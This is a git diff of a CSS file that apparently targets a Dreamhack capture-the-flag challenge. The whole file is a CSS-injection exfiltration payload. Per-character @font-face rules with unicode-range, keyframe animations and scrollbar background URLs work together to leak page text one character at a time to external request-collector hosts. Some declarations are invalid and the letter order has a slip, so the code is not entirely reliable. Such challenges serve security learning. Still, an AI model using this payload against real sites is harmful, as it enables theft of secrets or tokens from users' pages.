--- a/css.css
+++ b/css.css
@@ -13,97 +13,168 @@ body::after {
     animation: trychar 72s infinite step-end;
 }
 
-@font-face { font-family: rest; src: local('Courier New'); }
+@font-face { 
+    font-family: rest; 
+    src: local('Courier New'); 
+    unicode-range: U+0-10FFFF; 
+}
 
 /* 숫자 (0-9) 정의 */
-@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;}
-@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;}
-@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;}
-@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;}
-@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;}
-@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;}
-@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;}
-@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;}
-@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;}
-@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;}
+@font-face { font-family: has_0; src: local('Comic Sans MS'); unicode-range: U+30; font-style: monospace; }
+@font-face { font-family: has_1; src: local('Comic Sans MS'); unicode-range: U+31; font-style: monospace; }
+@font-face { font-family: has_2; src: local('Comic Sans MS'); unicode-range: U+32; font-style: monospace; }
+@font-face { font-family: has_3; src: local('Comic Sans MS'); unicode-range: U+33; font-style: monospace; }
+@font-face { font-family: has_4; src: local('Comic Sans MS'); unicode-range: U+34; font-style: monospace; }
+@font-face { font-family: has_5; src: local('Comic Sans MS'); unicode-range: U+35; font-style: monospace; }
+@font-face { font-family: has_6; src: local('Comic Sans MS'); unicode-range: U+36; font-style: monospace; }
+@font-face { font-family: has_7; src: local('Comic Sans MS'); unicode-range: U+37; font-style: monospace; }
+@font-face { font-family: has_8; src: local('Comic Sans MS'); unicode-range: U+38; font-style: monospace; }
+@font-face { font-family: has_9; src: local('Comic Sans MS'); unicode-range: U+39; font-style: monospace; }
 
 /* 소문자 (a-z) 정의 */
-@font-face{font-family:has_a;src:local('Comic Sans MS');unicode-range:U+61;}
-@font-face{font-family:has_b;src:local('Comic Sans MS');unicode-range:U+62;}
-@font-face{font-family:has_c;src:local('Comic Sans MS');unicode-range:U+63;}
-@font-face{font-family:has_d;src:local('Comic Sans MS');unicode-range:U+64;}
-@font-face{font-family:has_e;src:local('Comic Sans MS');unicode-range:U+65;}
-@font-face{font-family:has_f;src:local('Comic Sans MS');unicode-range:U+66;}
-@font-face{font-family:has_g;src:local('Comic Sans MS');unicode-range:U+67;}
-@font-face{font-family:has_h;src:local('Comic Sans MS');unicode-range:U+68;}
-@font-face{font-family:has_i;src:local('Comic Sans MS');unicode-range:U+69;}
-@font-face{font-family:has_j;src:local('Comic Sans MS');unicode-range:U+6a;}
-@font-face{font-family:has_k;src:local('Comic Sans MS');unicode-range:U+6b;}
-@font-face{font-family:has_l;src:local('Comic Sans MS');unicode-range:U+6c;}
-@font-face{font-family:has_m;src:local('Comic Sans MS');unicode-range:U+6d;}
-@font-face{font-family:has_n;src:local('Comic Sans MS');unicode-range:U+6e;}
-@font-face{font-family:has_o;src:local('Comic Sans MS');unicode-range:U+6f;}
-@font-face{font-family:has_p;src:local('Comic Sans MS');unicode-range:U+70;}
-@font-face{font-family:has_q;src:local('Comic Sans MS');unicode-range:U+71;}
-@font-face{font-family:has_r;src:local('Comic Sans MS');unicode-range:U+72;}
-@font-face{font-family:has_s;src:local('Comic Sans MS');unicode-range:U+73;}
-@font-face{font-family:has_t;src:local('Comic Sans MS');unicode-range:U+74;}
-@font-face{font-family:has_u;src:local('Comic Sans MS');unicode-range:U+75;}
-@font-face{font-family:has_v;src:local('Comic Sans MS');unicode-range:U+76;}
-@font-face{font-family:has_w;src:local('Comic Sans MS');unicode-range:U+77;}
-@font-face{font-family:has_x;src:local('Comic Sans MS');unicode-range:U+78;}
-@font-face{font-family:has_y;src:local('Comic Sans MS');unicode-range:U+79;}
-@font-face{font-family:has_z;src:local('Comic Sans MS');unicode-range:U+7a;}
+@font-face { font-family: has_a; src: local('Comic Sans MS'); unicode-range: U+61; font-style: monospace; }
+@font-face { font-family: has_b; src: local('Comic Sans MS'); unicode-range: U+62; font-style: monospace; }
+@font-face { font-family: has_c; src: local('Comic Sans MS'); unicode-range: U+63; font-style: monospace; }
+@font-face { font-family: has_d; src: local('Comic Sans MS'); unicode-range: U+64; font-style: monospace; }
+@font-face { font-family: has_e; src: local('Comic Sans MS'); unicode-range: U+65; font-style: monospace; }
+@font-face { font-family: has_f; src: local('Comic Sans MS'); unicode-range: U+66; font-style: monospace; }
+@font-face { font-family: has_g; src: local('Comic Sans MS'); unicode-range: U+67; font-style: monospace; }
+@font-face { font-family: has_h; src: local('Comic Sans MS'); unicode-range: U+68; font-style: monospace; }
+@font-face { font-family: has_i; src: local('Comic Sans MS'); unicode-range: U+69; font-style: monospace; }
+@font-face { font-family: has_j; src: local('Comic Sans MS'); unicode-range: U+6a; font-style: monospace; }
+@font-face { font-family: has_k; src: local('Comic Sans MS'); unicode-range: U+6b; font-style: monospace; }
+@font-face { font-family: has_l; src: local('Comic Sans MS'); unicode-range: U+6c; font-style: monospace; }
+@font-face { font-family: has_m; src: local('Comic Sans MS'); unicode-range: U+6d; font-style: monospace; }
+@font-face { font-family: has_n; src: local('Comic Sans MS'); unicode-range: U+6e; font-style: monospace; }
+@font-face { font-family: has_o; src: local('Comic Sans MS'); unicode-range: U+6f; font-style: monospace; }
+@font-face { font-family: has_p; src: local('Comic Sans MS'); unicode-range: U+70; font-style: monospace; }
+@font-face { font-family: has_q; src: local('Comic Sans MS'); unicode-range: U+71; font-style: monospace; }
+@font-face { font-family: has_r; src: local('Comic Sans MS'); unicode-range: U+72; font-style: monospace; }
+@font-face { font-family: has_s; src: local('Comic Sans MS'); unicode-range: U+73; font-style: monospace; }
+@font-face { font-family: has_t; src: local('Comic Sans MS'); unicode-range: U+74; font-style: monospace; }
+@font-face { font-family: has_u; src: local('Comic Sans MS'); unicode-range: U+75; font-style: monospace; }
+@font-face { font-family: has_v; src: local('Comic Sans MS'); unicode-range: U+76; font-style: monospace; }
+@font-face { font-family: has_w; src: local('Comic Sans MS'); unicode-range: U+77; font-style: monospace; }
+@font-face { font-family: has_x; src: local('Comic Sans MS'); unicode-range: U+78; font-style: monospace; }
+@font-face { font-family: has_y; src: local('Comic Sans MS'); unicode-range: U+79; font-style: monospace; }
+@font-face { font-family: has_z; src: local('Comic Sans MS'); unicode-range: U+7a; font-style: monospace; }
 
 /* keyframes 정의 (한 글자당 2초씩 총 72초) */
 @keyframes trychar {
-  0%   { font-family: has_0; background: url("https://tqysgwa.request.dreamhack.games/leak?char=0"); }
-  2.7% { font-family: has_1; background: url("https://tqysgwa.request.dreamhack.games/leak?char=1"); }
-  5.5% { font-family: has_2; background: url("https://tqysgwa.request.dreamhack.games/leak?char=2"); }
-  8.3% { font-family: has_3; background: url("https://tqysgwa.request.dreamhack.games/leak?char=3"); }
-  11.1% { font-family: has_4; background: url("https://tqysgwa.request.dreamhack.games/leak?char=4"); }
-  13.8% { font-family: has_5; background: url("https://tqysgwa.request.dreamhack.games/leak?char=5"); }
-  16.6% { font-family: has_6; background: url("https://tqysgwa.request.dreamhack.games/leak?char=6"); }
-  19.4% { font-family: has_7; background: url("https://tqysgwa.request.dreamhack.games/leak?char=7"); }
-  22.2% { font-family: has_8; background: url("https://tqysgwa.request.dreamhack.games/leak?char=8"); }
-  25%   { font-family: has_9; background: url("https://tqysgwa.request.dreamhack.games/leak?char=9"); }
-
-  /* 소문자 a-z */
-  27.7% { font-family: has_a; background: url("https://tqysgwa.request.dreamhack.games/leak?char=a"); }
-  30.5% { font-family: has_b; background: url("https://tqysgwa.request.dreamhack.games/leak?char=b"); }
-  33.3% { font-family: has_c; background: url("https://tqysgwa.request.dreamhack.games/leak?char=c"); }
-  36.1% { font-family: has_d; background: url("https://tqysgwa.request.dreamhack.games/leak?char=d"); }
-  38.8% { font-family: has_e; background: url("https://tqysgwa.request.dreamhack.games/leak?char=e"); }
-  41.6% { font-family: has_f; background: url("https://tqysgwa.request.dreamhack.games/leak?char=f"); }
-  44.4% { font-family: has_g; background: url("https://tqysgwa.request.dreamhack.games/leak?char=g"); }
-  47.2% { font-family: has_h; background: url("https://tqysgwa.request.dreamhack.games/leak?char=h"); }
-  50%   { font-family: has_i; background: url("https://tqysgwa.request.dreamhack.games/leak?char=i"); }
-  52.7% { font-family: has_j; background: url("https://tqysgwa.request.dreamhack.games/leak?char=j"); }
-  55.5% { font-family: has_k; background: url("https://tqysgwa.request.dreamhack.games/leak?char=k"); }
-  58.3% { font-family: has_l; background: url("https://tqysgwa.request.dreamhack.games/leak?char=l"); }
-  61.1% { font-family: has_m; background: url("https://tqysgwa.request.dreamhack.games/leak?char=m"); }
-  63.8% { font-family: has_n; background: url("https://tqysgwa.request.dreamhack.games/leak?char=n"); }
-  66.6% { font-family: has_o; background: url("https://tqysgwa.request.dreamhack.games/leak?char=o"); }
-  69.4% { font-family: has_p; background: url("https://tqysgwa.request.dreamhack.games/leak?char=p"); }
-  72.2% { font-family: has_q; background: url("https://tqysgwa.request.dreamhack.games/leak?char=q"); }
-  75%   { font-family: has_r; background: url("https://tqysgwa.request.dreamhack.games/leak?char=r"); }
-  77.7% { font-family: has_s; background: url("https://tqysgwa.request.dreamhack.games/leak?char=s"); }
-  80.5% { font-family: has_t; background: url("https://tqysgwa.request.dreamhack.games/leak?char=t"); }
-  83.3% { font-family: has_u; background: url("https://tqysgwa.request.dreamhack.games/leak?char=u"); }
-  86.1% { font-family: has_v; background: url("https://tqysgwa.request.dreamhack.games/leak?char=v"); }
-  88.8% { font-family: has_w; background: url("https://tqysgwa.request.dreamhack.games/leak?char=w"); }
-  91.6% { font-family: has_x; background: url("https://tqysgwa.request.dreamhack.games/leak?char=x"); }
-  94.4% { font-family: has_y; background: url("https://tqysgwa.request.dreamhack.games/leak?char=y"); }
-  97.2% { font-family: has_z; background: url("https://tqysgwa.request.dreamhack.games/leak?char=z"); }
-
-  100%  { font-family: rest; }
+  0% { font-family: rest; }
+  1% { font-family: has_0, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=0"); }
+  2% { font-family: rest; }
+  3% { font-family: has_1, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=1"); }
+  4% { font-family: rest; }
+  5% { font-family: has_2, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=2"); }
+  6% { font-family: rest; }
+  7% { font-family: has_3, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=3"); }
+  8% { font-family: rest; }
+  9% { font-family: has_4, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=4"); }
+  10% { font-family: rest; }
+  11% { font-family: has_5, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=5"); }
+  12% { font-family: rest; }
+  13% { font-family: has_6, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=6"); }
+  14% { font-family: rest; }
+  15% { font-family: has_7, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=7"); }
+  16% { font-family: rest; }
+  17% { font-family: has_8, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=8"); }
+  18% { font-family: rest; }
+  19% { font-family: has_9, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=9"); }
+  20% { font-family: rest; }
+  21% { font-family: has_a, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=a"); }
+  22% { font-family: rest; }
+  23% { font-family: has_b, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=b"); }
+  24% { font-family: rest; }
+  25% { font-family: has_c, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=c"); }
+  26% { font-family: rest; }
+  27% { font-family: has_d, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=d"); }
+  28% { font-family: rest; }
+  29% { font-family: has_e, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=e"); }
+  30% { font-family: rest; }
+  31% { font-family: has_f, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=f"); }
+  32% { font-family: rest; }
+  33% { font-family: has_g, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=g"); }
+  34% { font-family: rest; }
+  35% { font-family: has_h, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=h"); }
+  36% { font-family: rest; }
+  37% { font-family: has_i, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=i"); }
+  38% { font-family: rest; }
+  39% { font-family: has_j, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=j"); }
+  40% { font-family: rest; }
+  41% { font-family: has_k, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=k"); }
+  42% { font-family: rest; }
+  43% { font-family: has_l, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=l"); }
+  44% { font-family: rest; }
+  45% { font-family: has_n, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=n"); }
+  46% { font-family: rest; }
+  47% { font-family: has_m, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=m"); }
+  48% { font-family: rest; }
+  49% { font-family: has_o, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=o"); }
+  50% { font-family: rest; }
+  51% { font-family: has_p, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=p"); }
+  52% { font-family: rest; }
+  53% { font-family: has_q, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=q"); }
+  54% { font-family: rest; }
+  55% { font-family: has_r, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=r"); }
+  56% { font-family: rest; }
+  57% { font-family: has_s, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=s"); }
+  58% { font-family: rest; }
+  59% { font-family: has_t, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=t"); }
+  60% { font-family: rest; }
+  61% { font-family: has_u, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=u"); }
+  62% { font-family: rest; }
+  63% { font-family: has_v, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=v"); }
+  64% { font-family: rest; }
+  65% { font-family: has_w, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=w"); }
+  66% { font-family: rest; }
+  67% { font-family: has_x, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=x"); }
+  68% { font-family: rest; }
+  69% { font-family: has_y, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=y"); }
+  70% { font-family: rest; }
+  71% { font-family: has_z, rest; --leak: url("https://hwkadfv.request.dreamhack.games/leak=z"); }
 }
 
-
-/* side-channel: overflow가 발생하면 요청 전송 */
-body {
-    overflow-y: auto;
+/* increase width char by char, i.e. add new char to prefix */
+@keyframes loop {
+  0% { width: 0px; }
+  1% { width: 15px; }
+  2% { width: 30px; }
+  3% { width: 45px; }
+  4% { width: 60px; }
+  5% { width: 75px; }
+  6% { width: 90px; }
+  7% { width: 105px; }
+  8% { width: 120px; }
+  9% { width: 135px; }
+  10% { width: 150px; }
+  11% { width: 165px; }
+  12% { width: 180px; }
+  13% { width: 195px; }
+  14% { width: 210px; }
+  15% { width: 225px; }
+  16% { width: 240px; }
+  17% { width: 255px; }
+  18% { width: 270px; }
+  19% { width: 285px; }
+  20% { width: 300px; }
+  21% { width: 315px; }
+  22% { width: 330px; }
+  23% { width: 345px; }
+  24% { width: 360px; }
+  25% { width: 375px; }
+  26% { width: 390px; }
+  27% { width: 405px; }
+  28% { width: 420px; }
+  29% { width: 435px; }
+  30% { width: 0px; }
 }
+
+/* body의 스크롤바를 사용 (div 대신) */
 body::-webkit-scrollbar {
-    background-image: url("https://tqysgwa.request.dreamhack.games/leak");
+    background: blue;
+}
+
+body::-webkit-scrollbar:vertical {
+    background: blue var(--leak);
 }
